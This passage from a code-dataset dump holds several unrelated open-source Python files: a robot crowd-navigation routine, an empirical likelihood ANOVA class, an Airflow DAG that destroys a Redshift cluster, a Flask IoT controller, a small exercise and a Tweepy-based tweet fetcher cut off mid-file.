end_point_err_robot, buffer_robot, buffer_ped, obs_duration_robot,\n obs_duration_ped, gp_x, gp_y,\n ess_time_array,\n ess_array, conditioned, data_set, support_boost,\n goal_dex, x_nonzero, y_nonzero, \n normal_vel, full_traj):\n # x,y is x_follow, y_follow\n # TDEX\n if frame == 0:\n Tdex, robot_goal_x, robot_goal_y \\\n = eth_Tdex(Tdex_max, frame, num_peds, max_vel_robot,\n robot_start_x, robot_start_y,\n robot_goal_x, robot_goal_y,\n 0, 0, 0, 0,\n data_set, support_boost,\n goal_dex, x_nonzero, y_nonzero,\n normal_vel, full_traj)\n else:\n Tdex, robot_goal_x, robot_goal_y \\\n = eth_Tdex(Tdex_max, frame, num_peds, max_vel_robot,\n robot_start_x, robot_start_y,\n robot_goal_x, robot_goal_y,\n vel_x, vel_y, cmd_x, cmd_y,\n data_set, support_boost,\n goal_dex, x_nonzero, y_nonzero,\n normal_vel, full_traj)\n # print('Tdex:\\n', Tdex)\n\n # start_time = time.time()\n # GP COMPUTATION\n if frame == 0:\n gp_x, gp_y, mu_linear_conditioned_x, mu_linear_conditioned_y, \\\n mu_linear_un_x, mu_linear_un_y, \\\n cov_linear_conditioned_x, cov_linear_conditioned_y, cov_un_x, cov_un_y, \\\n x_obs, y_obs, x_obs_un, y_obs_un, time_gp \\\n = distnav_gp_computation(frame, num_peds, x, y, x_obs, y_obs,\n x_obs_un, y_obs_un, err_magnitude_ped, err_magnitude_robot,\n end_point_err_ped, end_point_err_robot, buffer_robot, buffer_ped,\n robot_start_x, robot_start_y, robot_goal_x, robot_goal_y,\n 0, 0, obs_duration_robot, obs_duration_ped, Tdex, gp_x, gp_y)\n else:\n gp_x, gp_y, mu_linear_conditioned_x, mu_linear_conditioned_y, \\\n mu_linear_un_x, mu_linear_un_y, \\\n cov_linear_conditioned_x, cov_linear_conditioned_y, cov_un_x, cov_un_y, \\\n x_obs, y_obs, x_obs_un, y_obs_un, time_gp \\\n = distnav_gp_computation(frame, num_peds, x, y, x_obs, y_obs,\n x_obs_un, y_obs_un, err_magnitude_ped, err_magnitude_robot,\n end_point_err_ped, end_point_err_robot, buffer_robot, buffer_ped,\n robot_start_x, robot_start_y, robot_goal_x, robot_goal_y,\n cmd_x, cmd_y, obs_duration_robot, obs_duration_ped,\n Tdex, gp_x, gp_y)\n\n # RENAMING\n robot_mu_x, robot_mu_y, robot_cov_x, robot_cov_y, \\\n inv_var_robot_x, inv_var_robot_y, inv_cov_robot_x, inv_cov_robot_y, \\\n ped_mu_x, ped_mu_y, ped_cov_x, ped_cov_y, cov_sum_x, cov_sum_y, \\\n inv_var_ped_x, inv_var_ped_y, inv_cov_ped_x, inv_cov_ped_y, \\\n inv_cov_sum_x, inv_cov_sum_y, one_over_robot_cov_x, one_over_robot_cov_y, \\\n one_over_ped_cov_x, one_over_ped_cov_y, \\\n one_over_cov_sum_x, one_over_cov_sum_y, \\\n one_over_cov_sumij_x, one_over_cov_sumij_y = rename(num_peds, conditioned,\n mu_linear_conditioned_x, mu_linear_conditioned_y,\n mu_linear_un_x, mu_linear_un_y,\n cov_linear_conditioned_x, cov_linear_conditioned_y,\n cov_un_x, cov_un_y)\n\n #######################################################################################################\n # IGP Computation\n start_time = time.time()\n \n # print('robot_mu_x type/shape:', type(robot_mu_x), robot_mu_x.shape)\n # print('robot_cov_x shape: ', robot_cov_x.shape)\n # print('ped_mu_x type/len:', type(ped_mu_x), len(ped_mu_x), ped_mu_x[0].shape)\n # print('ped_cov_x type/len:', type(ped_cov_x), len(ped_cov_x), ped_cov_x[0].shape)\n # print('mu_linear_conditioned_x len:', len(mu_linear_conditioned_x))\n\n # Filter out nonzero mean and cov\n nonzero_ped_idx = np.nonzero(np.sum(ped_mu_x, axis=1))[0]\n nonzero_ped_idx_robot = np.concatenate((nonzero_ped_idx, [num_peds]))\n num_peds_nonzero = len(nonzero_ped_idx)\n print('nonzero_ped_idx: ', len(nonzero_ped_idx))\n\n # Generate samples for each agent\n scale = cov_scale\n # num_samples = 500\n traj_len = len(robot_mu_x)\n agents_sample_x, agents_sample_y, agents_sample_x_nonzero, agents_sample_y_nonzero, \\\n agents_pdf_x, agents_pdf_y, agents_pdf_x_nonzero, agents_pdf_y_nonzero = \\\n generate_sample(robot_mu_x, robot_cov_x, robot_mu_y, robot_cov_y, ped_mu_x, ped_cov_x, ped_mu_y, ped_cov_y,\n traj_len, num_peds, num_samples, nonzero_ped_idx, scale)\n robot_rv_x = agents_sample_x[num_samples * num_peds:num_samples * (num_peds + 1)]\n robot_rv_y = agents_sample_y[num_samples * num_peds:num_samples * (num_peds + 1)]\n # print('test pdf list: ')\n # print(agents_pdf_x[0])\n # print(\"max robot cov: \", np.max(np.diag(robot_cov_x)))\n # print(\"robot cov: \", robot_cov_x)\n\n agents_mu_x = deepcopy(ped_mu_x)\n agents_mu_x.append(robot_mu_x)\n agents_mu_x = np.array(agents_mu_x)\n agents_mu_x_nonzero = agents_mu_x[nonzero_ped_idx_robot.astype(int)]\n # print(agents_mu_x_nonzero.shape)\n\n agents_mu_y = deepcopy(ped_mu_y)\n agents_mu_y.append(robot_mu_y)\n agents_mu_y = np.array(agents_mu_y)\n agents_mu_y_nonzero = agents_mu_y[nonzero_ped_idx_robot.astype(int)]\n\n # start_time = time.time()\n print(\"select important agents.\")\n influence_scores = importance_scores(agents_mu_x_nonzero, agents_mu_y_nonzero,\n agents_sample_x_nonzero, agents_sample_y_nonzero,\n traj_len, num_peds_nonzero, num_samples,\n p2w_x, p2w_y, a, h)\n print('importance score computation time: ', time.time() - start_time)\n influence_scores[np.diag_indices(num_peds_nonzero + 1)] = np.zeros(num_peds_nonzero + 1, dtype=np.float32)\n # print('influence_scores: ', influence_scores[num_peds_nonzero])\n # print(influence_scores)\n graph_adjacency_mat = (influence_scores > score_thred).astype(np.int32)\n\n #########\n # clustering just for the robot node (depth: 1)\n robot_influence_nodes = np.nonzero(graph_adjacency_mat[num_peds_nonzero])[0]\n robot_influence_idx = nonzero_ped_idx[robot_influence_nodes]\n essential_cluster = np.concatenate((robot_influence_idx, [num_peds]))\n print('essential cluster: ', essential_cluster)\n ess = len(essential_cluster) - 1\n ess_array[frame] = ess\n\n #######################################################################################################\n # Real IGP Compuation\n\n # extract the samples based on essential cluster\n essential_num = len(essential_cluster)\n essential_samples_x = np.zeros((num_samples * essential_num, traj_len))\n essential_samples_y = np.zeros((num_samples * essential_num, traj_len))\n for i in range(essential_num):\n idx = essential_cluster[i]\n essential_samples_x[i * num_samples:(i + 1) * num_samples] = agents_sample_x[\n idx * num_samples:(idx + 1) * num_samples]\n essential_samples_y[i * num_samples:(i + 1) * num_samples] = agents_sample_y[\n idx * num_samples:(idx + 1) * num_samples]\n # print('essential samples shape: ', essential_samples_x.shape)\n essential_pdf_x = agents_pdf_x[essential_cluster]\n essential_pdf_y = agents_pdf_y[essential_cluster]\n\n robot_eql_traj_x = np.zeros((num_samples, traj_len))\n robot_eql_traj_y = np.zeros((num_samples, traj_len))\n robot_eql_idx = np.zeros(num_samples)\n\n if essential_num != 1:\n # compute IGP weights\n print(\"compute IGP weights\")\n weights = vigp_compute(essential_samples_x, essential_samples_y, essential_pdf_x, essential_pdf_y,\n essential_num, num_samples, traj_len, p2w_x, p2w_y, a, h, obj_thred, max_iter,\n coll_weight)\n if include_pdf_weight: # times weights with original pdf for selection\n # extract optimal robot trajectory\n robot_pdf = agents_pdf_x[-1] * agents_pdf_y[-1]\n opt_idx = np.argmax(robot_pdf * weights[-1])\n opt_robot_traj_x = agents_sample_x[num_samples * num_peds:num_samples * (num_peds + 1)][opt_idx].copy()\n opt_robot_traj_y = agents_sample_y[num_samples * num_peds:num_samples * (num_peds + 1)][opt_idx].copy()\n robot_eql_traj_x = opt_robot_traj_x.copy()\n robot_eql_traj_y = opt_robot_traj_y.copy()\n # extract optimal pedestrian trajectories\n opt_joint_traj_x = np.zeros((essential_num, traj_len))\n opt_joint_traj_y = np.zeros((essential_num, traj_len))\n for i in range(essential_num):\n agent_idx = essential_cluster[i]\n single_agent_pdf = agents_pdf_x[agent_idx] * agents_pdf_y[agent_idx]\n opt_idx = np.argmax(single_agent_pdf * weights[i])\n opt_joint_traj_x[i] = agents_sample_x[num_samples * agent_idx:num_samples * (agent_idx + 1)][\n opt_idx].copy()\n opt_joint_traj_y[i] = agents_sample_y[num_samples * agent_idx:num_samples * (agent_idx + 1)][\n opt_idx].copy()\n else:\n # extract optimal robot trajectory\n # robot_pdf = agents_pdf_x[-1] * agents_pdf_x[-1]\n opt_idx = np.argmax(weights[-1])\n opt_robot_traj_x = agents_sample_x[num_samples * num_peds:num_samples * (num_peds + 1)][opt_idx].copy()\n opt_robot_traj_y = agents_sample_y[num_samples * num_peds:num_samples * (num_peds + 1)][opt_idx].copy()\n robot_eql_traj_x = opt_robot_traj_x.copy()\n robot_eql_traj_y = opt_robot_traj_y.copy()\n # extract optimal pedestrian trajectories\n opt_joint_traj_x = np.zeros((essential_num, traj_len))\n opt_joint_traj_y = np.zeros((essential_num, traj_len))\n for i in range(essential_num):\n agent_idx = essential_cluster[i]\n # single_agent_pdf = agents_pdf_x[agent_idx] * agents_pdf_y[agent_idx]\n opt_idx = np.argmax(weights[i])\n opt_joint_traj_x[i] = agents_sample_x[num_samples * agent_idx:num_samples * (agent_idx + 1)][\n opt_idx].copy()\n opt_joint_traj_y[i] = agents_sample_y[num_samples * agent_idx:num_samples * (agent_idx + 1)][\n opt_idx].copy()\n else:\n opt_robot_traj_x = np.array([robot_mu_x.copy()])\n opt_robot_traj_y = np.array([robot_mu_y.copy()])\n opt_joint_traj_x = np.array([robot_mu_x.copy()])\n opt_joint_traj_y = np.array([robot_mu_y.copy()])\n robot_eql_idx = np.zeros(num_samples)\n robot_eql_traj_x = np.array([robot_mu_x.copy() for _ in range(num_samples)])\n robot_eql_traj_y = np.array([robot_mu_y.copy() for _ in range(num_samples)])\n\n # process and store optimization time\n ess_time = time.time() - start_time\n ess_time_array[frame] = ess_time\n ess_ave_time = math.trunc(1e3 * np.mean(ess_time_array[:frame + 1])) / 1e3\n ess_std_time = math.trunc(1e3 * np.std(ess_time_array[:frame + 1])) / 1e3\n\n print('e_igp_compute elapsed time: ', time.time() - start_time, time_gp * ess)\n\n time_gp = time_gp * (num_peds_nonzero + 1)\n\n #######################################################################################################\n\n return robot_goal_x, robot_goal_y, gp_x, gp_y, x_obs, y_obs, \\\n x_obs_un, y_obs_un, robot_mu_x, robot_mu_y, ped_mu_x, ped_mu_y, \\\n robot_cov_x, robot_cov_y, ped_cov_x, ped_cov_y, \\\n nonzero_ped_idx, nonzero_ped_idx_robot, influence_scores, essential_cluster, \\\n robot_rv_x, robot_rv_y, opt_robot_traj_x, opt_robot_traj_y, \\\n opt_joint_traj_x, opt_joint_traj_y, robot_eql_idx.copy(), robot_eql_traj_x.copy(), robot_eql_traj_y.copy(), \\\n ess, ess_array, ess_time, ess_time_array, ess_ave_time, ess_std_time, time_gp\n\n # ess, top_Z_indices, ess_array, ess_time, ess_time_array, \\\n # ess_ave_time, \\\n # ess_std_time, optima, optimal_ll, optima_dex, num_optima, \\\n # norm_likelihood, global_optima_dex, time_gp, \\\n # agent_disrupt, robot_agent_disrupt\n","repo_name":"MurpheyLab/DistNav-ETH-Evaluation","sub_path":"distnav/distnav_run.py","file_name":"distnav_run.py","file_ext":"py","file_size_in_byte":13968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"11951193223","text":"import numpy as np \nimport scipy\nfrom scipy.optimize import fsolve, root_scalar\nfrom tqdm import tqdm\n\n# realisation of the Empirical Likelihood One-Way ANOVA (the description of the method can be found \n# in the book of its author: \"Empirical Likelihood\" by Art B. Owen, CHAPMAN & HALL/CRC, 2001). \n\n# utils.\ndef get_samples(s, n=20, K=5, std=None):\n '''\n samples from tasks for theme 6 (ksampletests)\n\n input:\n s: string, type of sample\n n: list of sample sizes\n K: int, subsamples in sample\n std: numpy array of standard deviations, shape = (K, )\n\n samples from:\n a) normal distribution: N(a_i, 1).\n b) uniform distribution: U[a_i-0.5, a_i+0.5]\n c) Laplace distribution: Laplace(a_i, 1) ~ [exp(1) with sign] + a_i\n\n with:\n 1) a_1=...=a_5=0,\n 2) a_1=...=a_4=0, a_5=0.5,\n 3) a_i=i/10,\n 4) like 1) but: std(X_5) = 2*std(X_1).\n\n output:\n list with K subsamples, subsample shapes: (n[i], )\n '''\n\n if isinstance(n, int):\n n = np.ones(K).astype('int64') * n\n\n scale_norm = np.ones(K) # std\n loc_uniform = -0.5 * np.ones(K) # left bound of support\n scale_uniform = np.ones(K) # length of support\n scale_laplace = np.ones(K) # scale^{-1} is assosiated 'exp' parameter. \n\n if isinstance(std, np.ndarray):\n # remind for [symmetric] uniform: std(X) = (b-a) / sqrt(12) = [b = c, a = -c] = c / sqrt(3)\n # remind for Laplace: std(X) = sqrt(2) * scale; \n scale_norm = std\n loc_uniform = -std * np.sqrt(3)\n scale_uniform = 2 * std * np.sqrt(3)\n scale_laplace = std / np.sqrt(2)\n\n if s=='a1': # N(0, 1)\n X = [scipy.stats.norm.rvs(size=n[i], scale=scale_norm[i]) for i in range(K)]\n if s=='a2': # N(0, 1) & N(0.5, 1)\n X = [scipy.stats.norm.rvs(size=n[i], scale=scale_norm[i]) for i in range(K)]\n X[-1] = X[-1] + 0.5\n if s=='a3': # N(i/10, 1)\n X = [scipy.stats.norm.rvs(size=n[i], loc=i/10, scale=scale_norm[i]) for i in range(K)]\n if s=='a4': # N(0, 1) & N(0, 4)\n X = [scipy.stats.norm.rvs(size=n[i]) for i in range(K)]\n X[-1] = X[-1] * 2\n \n if s=='b1': # R[-1/2, 1/2]\n X = [scipy.stats.uniform.rvs(size=n[i], loc=loc_uniform[i], scale=scale_uniform[i]) for i in range(K)]\n if s=='b2': # R[-1/2, 1/2] & R[0, 1]\n X = [scipy.stats.uniform.rvs(size=n[i], loc=loc_uniform[i], scale=scale_uniform[i]) for i in range(K)]\n X[-1] = X[-1] + 0.5\n if s=='b3': # R[-0.5 + i/10, 0.5 + i/10]\n X = [scipy.stats.uniform.rvs(size=n[i], loc=loc_uniform[i], scale=scale_uniform[i]) + i/10 for i in range(K)]\n if s=='b4': # R[-1/2 , 1/2] & R[-1, 1]\n X = [scipy.stats.uniform.rvs(size=n[i], loc=-0.5, scale=1) for i in range(K)]\n X[-1] = X[-1] * 2\n \n if s=='c1': # Laplace(0, 1)\n X = [scipy.stats.laplace.rvs(size=n[i], scale=scale_laplace[i]) for i in range(K)]\n if s=='c2': # Laplace(0, 1) & Laplace(0.5, 1)\n X = [scipy.stats.laplace.rvs(size=n[i], scale=scale_laplace[i]) for i in range(K)]\n X[-1] = X[-1] + 0.5\n if s=='c3': # Laplace(i/10, 1)\n X = [scipy.stats.laplace.rvs(size=n[i], loc=i/10, scale=scale_laplace[i]) for i in range(K)]\n if s=='c4': # Laplace(0, 1) & Laplace(0, 0.5)\n X = [scipy.stats.laplace.rvs(size=n[i], scale=1) for i in range(K)]\n X[-1] = X[-1] * 2\n \n return X\n\n\ndef pvals_plot(pvals, ax, title, bisector=True):\n '''\n input:\n pvals: sorted (!) numpy array\n ax: matplotlib Axes object\n title: string\n bisector: y=x on plot\n\n change axes: plot of 'linearly interpolated' p-value ECDF. \n '''\n if bisector:\n xvals = np.linspace(0, 1, num=pvals.shape[0]).tolist() + [1] \n ax.plot(pvals.tolist()+[1], xvals, color='tab:blue')\n ax.plot(xvals, xvals, '--', color='tab:red')\n else:\n xvals = np.linspace(0, 1, num=pvals.shape[0])\n ax.plot(pvals, xvals, color='tab:blue')\n\n ax.set_title(title)\n\n\n# utils.\ndef pseudo_log(x):\n '''\n log with quadratic approximation if x < 1.\n\n input: numpy array or float/int\n '''\n if not isinstance(x, np.ndarray):\n y = np.array(x)\n else:\n y = x.copy()\n \n y = np.where(y > 1, np.log(y), y-1 - (y-1)**2 / 2)\n return y if y.shape else y.item()\n\n\ndef L_star(l, mu, X):\n '''\n let K be the number of subsamples\n\n input:\n mu: mean\n params: array with shape (K,): [l1,...,l_K] - Lagrange multipliers\n X: list of K numpy arrays with shape (n_i, )\n '''\n\n N = sum([x.shape[0] for x in X])\n K = len(X)\n \n stat = 0\n for i in range(K):\n term = N + l[i]*(X[i]-mu)\n if np.any(term < 0):\n print(f'Negative term: mu={mu}')\n stat += np.sum(pseudo_log(term))\n\n return stat - N*np.log(N)\n\n\ndef L(l, mu, X):\n '''\n let K be the number of subsamples.\n\n input:\n mu: mean\n params: array with shape (K,): [l1,...,l_K] - Lagrange multipliers\n X: list of K numpy arrays with shape (n_i, )\n\n output:\n min_{mu} max_{l} L(l, mu) = L(l*, mu*) = -max_{mu} ln(R(mu))\n '''\n\n N = sum([x.shape[0] for x in X])\n K = len(X)\n \n stat = 0\n for i in range(K):\n term = N / (N + l[i]*(X[i]-mu))\n\n\t\t# This condition is bad (but right: we need to get log(R)=-inf).\n\t\t# It doesn't allow us to use optimizing techniques - cause optimizer will just do some negative term and go to inf...\n if np.any(term < 0):\n # print(f'Negative term under log: mu={mu}')\n return np.inf\n\n stat -= np.sum(np.log(term))\n return stat\n\n\ndef optimality_equations(l, X, mu):\n '''\n map R^{K+1} \\to R^{K+1}\n\n input:\n l: list with len K: [l1,...,l_K] - Lagrange multipliers (if mu=None, list with len K+1: [l1,...,l_K, mu])\n X: list of K numpy arrays with shape (n_i, )\n\n optimality_equations(l*, X) = 0 for optimal l*\n\n output:\n mu=None: numpy array, shape=(K+1,)\n mu=mu_0: numpy array, shape=(K,)\n '''\n n = np.array([x.shape[0] for x in X]) # subsamples sizes\n N = n.sum()\n K = len(X)\n \n if mu is None: # mu is unknown: K+1 equations\n equations = np.zeros(K+1)\n for i in range(K):\n equations[i] += np.sum( (X[i]-l[-1]) / (N + l[i]*(X[i]-l[-1])) ) # sum_j\n equations[-1] += np.sum( l[i] / (N + l[i]*(X[i]-l[-1])) )\n else: # mu = mu_0: K equations\n equations = np.zeros(K)\n for i in range(K):\n equations[i] += np.sum( (X[i]-mu) / (N + l[i]*(X[i]-mu)) ) # sum_j\n\n return equations\n\n\n# main class.\nclass ANOVA_EL():\n '''\n 1) run the Empirical Likelihood Ratio ANOVA test and get the (asymptotic-based) pvalue of this test.\n \n If H_0 wasn't rejected:\n 2) find Maximum Empirical Likelihood Estimator (MELE) of the common mean.\n 3) find asymptotic 95%-confidence interval for the common mean.\n '''\n def __init__(self):\n self.logR = 0 # log-profile function R(X)\n self.pvalue = 0 # pvalue of one-way ANOVA EL test\n self.l = [] # optimal Lagrange Multipliers\n self.MELE = 0 # optimal mu (Maximum Empirical Likelihood Estimator)\n \n def fit(self, X, verbose=False):\n '''\n X: list of K numpy arrays with shape (n_i, ), n_1+...+n_K = N\n verbose: prints output\n\n - MELE of mu.\n - log-statistic value.\n - test pvalue.\n '''\n self.df = len(X)-1\n self.logR = self.R(mu=None, X=X, verbose=verbose)\n self.pvalue = scipy.stats.chi2.sf(x=-2*self.logR, df=self.df)\n \n def R(self, mu, X, verbose=False):\n '''\n input:\n X: list of K numpy arrays with shape (n_i, ), n_1+...+n_K = N\n mu: if mu=None => find optimal mu (MELE); else: calculate log(R(mu))\n verbose: if True - prints output\n\n output:\n log of maximum profile function.\n '''\n N = sum([x.shape[0] for x in X])\n K = len(X)\n \n if mu is None: # mu is unknown\n sample_mean = sum([x.sum() for x in X]) / N\n l = np.zeros(K).tolist() + [sample_mean]\n \n if verbose:\n l_optimal, d, _, message = fsolve(optimality_equations, l, args=(X, None), full_output=True)\n calls = d['nfev'] # function calls.\n residual = np.sum(np.abs(d['fvec'])) # residual.\n else:\n l_optimal = fsolve(optimality_equations, l, args=(X, None))\n\n self.l, self.MELE = l_optimal[:-1], l_optimal[-1]\n\n if verbose:\n p = []\n for i in range(K):\n p.append(1/( N + self.l[i]*(X[i]-self.MELE)))\n p = np.array(p)\n\n print()\n print(f\"{f'Residual on call {calls}:':<25}\", residual)\n print(f\"{f'Opt. Lagrange mult.:':<25}\", np.around(self.l, 6))\n print(f\"{f'MELE:':<25}\", self.MELE)\n print(f\"{f'Probs is positive:':<25}\", np.all([np.all(p_ > 0) for p_ in p]))\n print(f\"{f'Sum of probs:':<25}\", sum([p_.sum() for p_ in p]))\n print(message)\n print()\n return -L(self.l, self.MELE, X)\n else: # mu = mu_0\n\n # convex hull condition.\n #for x in X:\n # if x.min() > mu or x.max() < mu:\n # return -np.inf\n\n l = np.zeros(K).tolist()\n l_optimal = fsolve(optimality_equations, l, args=(X, mu))\n return -L(l_optimal, mu, X)\n\n def confidence_interval(self, X):\n '''\n can be applied only after fit method (to get self.MELE)\n '''\n x_1 = min([min(x) for x in X])\n x_N = max([max(x) for x in X])\n q = scipy.stats.chi2.ppf(0.95, df=(self.df+1)) # we need to add 1 to df as we don't get max_{\\mu}.\n\n # log(R) is concave.\n try:\n left = root_scalar(lambda y: -2*self.R(y, X)-q, args=(), method='bisect', bracket=[x_1+1e-5, self.MELE], xtol=1e-6)\n right = root_scalar(lambda y: -2*self.R(y, X)-q, args=(), method='bisect', bracket=[self.MELE, x_N-1e-5], xtol=1e-6)\n return [left.root, right.root]\n except ValueError:\n return None # conf.set is empty...\n","repo_name":"thesnowballino/empirical_likelihood_anova","sub_path":"empirical_likelihood_anova.py","file_name":"empirical_likelihood_anova.py","file_ext":"py","file_size_in_byte":10430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10617238406","text":"import pandas as pd\ndef integer_set(fi):\n with open(fi) as f:\n answer=f.readlines()\n\n lambdaf=lambda x:int(x.strip(),2)\n\n answer=set(map(lambdaf,answer))\n\n return answer\n\nanswer_file=\"answer.txt\"\nsolution_file=\"simulated_solution.txt\"\n\nanswer=integer_set(answer_file)\nsolution=integer_set(solution_file)\n\nprint(\"Length answer: {} \\t Length solution: {}\".format(len(answer),len(solution)))\nprint(answer.difference(solution)) #If empty set, then the answers are identical\n","repo_name":"bricoletc/ctbl","sub_path":"simu/check_answer.py","file_name":"check_answer.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40985229397","text":"\"\"\"DAG to drop a redshift cluster.\"\"\"\nfrom airflow import DAG\nfrom airflow.utils.dates import days_ago\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.dummy_operator import DummyOperator\n\nfrom redshift_utils import destroy_cluster\n\n\nfrom datetime import timedelta\n\ndefault_args = {\n \"owner\": \"airflow\",\n \"depends_on_past\": True,\n \"wait_for_downstream\": True,\n \"start_date\": days_ago(15),\n \"email\": [\"airflow@example.com\"],\n \"email_on_failure\": False,\n \"email_on_retry\": False,\n \"retries\": 0,\n \"retry_delay\": timedelta(minutes=5),\n}\n\nwith DAG(\n \"destroy_redshift_cluster\",\n default_args=default_args,\n description=\"dag to destroy a redshift cluster\",\n schedule_interval=None,\n catchup=False,\n) as dag:\n\n start_task = DummyOperator(task_id=\"start\")\n\n source_env = BashOperator(\n task_Id=\"source_env_variables\", bash_command=\"source .env\"\n )\n\n destroy_cluster_task = PythonOperator(\n task_id=\"destroy_redshift_cluster\", python_callable=destroy_cluster.main,\n )\n\n end_task = DummyOperator(task_id=\"end\")\n\n start_task >> source_env >> destroy_cluster_task >> end_task\n","repo_name":"ankhoudary12/covid19_etl","sub_path":"dags/destroy_redshift_cluster.py","file_name":"destroy_redshift_cluster.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27584367624","text":"import sys\nfrom const import *\nfrom flask import Flask, jsonify, make_response, abort, request\nfrom controller import ThingController\n\n\nID = sys.argv[1]\nPORT = sys.argv[2]\n\nprint(\"Iniciando Interface\")\n\napp = Flask(__name__)\napp.debug = DEBUG\n\nthing = ThingController()\n\n\n## DEFAULT ##\n@app.route('/', methods=['GET'])\ndef get_hello():\n info = {\n 'actions': {\n 'turn': ['on', 'off'],\n 'measurement': 'Integer'\n },\n 'measurement': {\n 'measurement': 'Integer'\n }\n }\n return make_response(jsonify(info), 200)\n\n\n@app.route('/actions', methods=['PUT'])\ndef action_turn():\n global thing\n actions = request.json\n result = thing.actions(actions)\n if result:\n if result['message']:\n return make_response(jsonify({'message': 'Action registered'}), 200)\n else:\n return make_response(jsonify(result), 200)\n else:\n return make_response(jsonify({'message': 'Action doesn\\'t exist'}), 404)\n\n\n@app.route('/obervables', methods=['PUT'])\ndef observe():\n # thing.observe(notify_event())\n return make_response({'message': 'Observable registered'}, 200)\n\n\ndef notify_event(event):\n print(\"Evento aconteceu\")\n\n\nif __name__ == '__main__':\n try:\n if DEBUG:\n app.run(port=int(PORT))\n else:\n app.run(host='0.0.0.0', port=int(PORT))\n except KeyboardInterrupt:\n pass\n finally:\n print(\"Cancelando a aplicação RESTful...\\n\")\n","repo_name":"thomasmarquesbr/middleware_flyiot","sub_path":"controller_sensor/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39906660449","text":"# configuration for this webapp\nimport server_config, user_administration, group_administration, share_administration, share_file_administration, user_auth\n\nname=\"streaPy configuration Application\"\n\ndocroot=\".\"\n\nsnakelets={\n\t\"serverConfig.sn\": server_config.ServerConfig,\n\t\"userAdministration.sn\": user_administration.UserAdministration,\n\t\"groupAdministration.sn\": group_administration.GroupAdministration,\n\t\"shareAdministration.sn\": share_administration.ShareAdministration,\n\t\"shareFileAdministration.sn\": share_file_administration.ShareFileAdministration,\n\t\"userAuth.sn\": user_auth.userAuth\n}\n\ndef dirListAllower(path):\n\t# path will be RELATIVE for this webapp, and NOT starting with /\n\n\t# this (root)webapp allows ALL dirs to be viewed\n\treturn True\n","repo_name":"toha/streapy","sub_path":"snakelets_webserver/Snakelets-1.44/webapps/streapy_config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3742268101","text":"cod1, quant1, valor1 = input().split()\ncod2, quant2, valor2 = input().split()\n\n#primeira linha\ncod1 = int(cod1)\nquant1 = int(quant1)\nvalor1 = float(valor1)\n\n#segunda linha\ncod2 = int(cod2)\nquant2 = int(quant2)\nvalor2 = float(valor2)\n\ntotal = (quant1 * valor1) + (quant2 * valor2)\nprint(f'VALOR A PAGAR: R$ {total:.2f}')\n","repo_name":"RFreitasAnjos/beecrowd","sub_path":"Begginer/Valortotal2produtos.py","file_name":"Valortotal2produtos.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19599683605","text":"from urllib.request import Request, urlopen\nfrom bs4 import BeautifulSoup\nimport requests\nimport time\nimport tweepy\nfrom datetime import datetime\nimport pytz\nimport whitelistUtil as wu\n\n\n\n#Makes the time acctually esaily readable ex: \"06:09 PM Oct-31\"\ndef parseTime(time=None):\n fmt = \"%I:%M %p %b-%d\"\n return time.strftime(fmt)\n\n#Read 'detWhitelistedTweets() comments to understand the code; its basically the same thing- without the whitelist for loop'\ndef getNonWhitelistedTweets(api, pRawQuery):\n data = \" \"\n easternTimezone = pytz.timezone('US/Eastern')\n utcTimezone = pytz.timezone('UTC')\n\n tweets = tweepy.Cursor(api.search, q=pRawQuery, lang=\"en\").items(3)\n for tweet in tweets:\n status = api.get_status(tweet.id ,tweet_mode=\"extended\")\n if tweet.text.split(\" \")[0] == \"RT\":\n pass\n else:\n rawTweetTime = datetime.strptime(str(tweet.created_at), \"%Y-%m-%d %H:%M:%S\")\n convTweetTime = utcTimezone.localize(rawTweetTime)\n tweetTime = parseTime(convTweetTime.astimezone(easternTimezone))\n scrnName = tweet.user.screen_name\n tweetText = status.full_text \n linkText = tweetText.split(\" \")[-1]\n \n if linkText[0:4] == \"http\":\n data += f\"@{scrnName}
{tweetText}
{tweetTime}
Link\"+\"

\"\n else:\n data += f\"@{scrnName}
{tweetText}
{tweetTime}

\" \n\n return data\n\n\n#Gets the **LATEST** tweets from the users specified in the whitelist, then returns a concatenated string, with html tags, for Flask web \ndef getWhitelistedTweets(api, pRawQuery):\n #Final var, will be concatenated and returned\n data = \" \"\n easternTimezone = pytz.timezone('US/Eastern')\n utcTimezone = pytz.timezone('UTC')\n\n #the only people whos' tweets will be returned\n whitelists = wu.readTwitterWhitelist()\n ##User given query, it is raw currently, because it needs some formatting to search for specif users, ex) \"$TSLA from:DeItaOne\"\n \n for whitelist in whitelists:\n #formats the search query to make it only from people in whitelist\n formattedSearch = pRawQuery + f\" from:{whitelist}\"\n #Searches and gets the 2 latest tweets, from the given query\n tweets = tweepy.Cursor(api.search, q=formattedSearch, lang=\"en\").items(3)\n \n for tweet in tweets:\n #Makes the tweet in \"extened mode\", whichs makes it not truncated, and shows the FULL tweet.\n status = api.get_status(tweet.id ,tweet_mode=\"extended\")\n \n #We dont want retweets, so checking if the first character is \"RT\" signifying it is a retweet \n if tweet.text.split(\" \")[0] == \"RT\":\n pass\n else:\n for name in whitelists:\n if tweet.user.screen_name == name:\n #Gets the time the tweet was tweeted, and formats it for later parsing\n rawTweetTime = datetime.strptime(str(tweet.created_at), \"%Y-%m-%d %H:%M:%S\")\n #converted to UTC\n convTweetTime = utcTimezone.localize(rawTweetTime)\n #Finally converted to EST\n tweetTime = parseTime(convTweetTime.astimezone(easternTimezone))\n #Gets the screen name of the tweeter\n scrnName = tweet.user.screen_name\n #The full un-truncated text\n tweetText = status.full_text \n #getting the link 